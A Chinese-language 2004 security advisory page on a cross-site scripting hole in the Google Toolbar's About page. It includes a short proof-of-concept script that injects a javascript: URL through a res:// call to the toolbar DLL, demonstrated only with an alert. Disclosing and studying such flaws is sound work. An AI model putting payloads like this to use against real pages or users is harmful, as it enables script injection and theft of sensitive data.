首页 > 安全 > 系统安全 >

Google工具栏About跨站脚本执行漏洞

2004-10-16

受影响系统:Google GoogleToolbar 漏洞描述:GoogleToolbar是集成于IE的工具条,方便用户搜索。GoogleToolbar存在一个输入验证问题,远程攻击者可以利用这个漏洞进行跨站脚本攻击,获得用户敏感信息。工具栏的About段不正确过

受影响系统


Google GoogleToolbar


漏洞描述:


GoogleToolbar是集成于IE的工具条,方便用户搜索。

GoogleToolbar存在一个输入验证问题,远程攻击者可以利用这个漏洞进行跨站脚本攻击,获得用户敏感信息。

工具栏的About段不正确过滤HTML代码,用户可以建立一HTML,当被目标用户装载时,会调用About页面,在页面上下问执行任意脚本代码。

<*来源:http://marc.theaimsgroup.com/?l=bugtraq&m=109553092727349&w=2*>




攻击代码:



以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<s c r i p t>
window.showModalDialog("res://C:\Program%20Files\Google\GoogleToolbar1.dll/ABOUT.HTML",
"<div style="background-image:
url(&#106avascript:alert(location.href));">");
</s>

Rafel Ivgi后来指出 res:协议不能从Internet区域调用,因此可防止远程利用此漏洞。




安全建议:


厂商补丁:

Google
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://toolbar.google.com/
相关文章
最新文章
热点推荐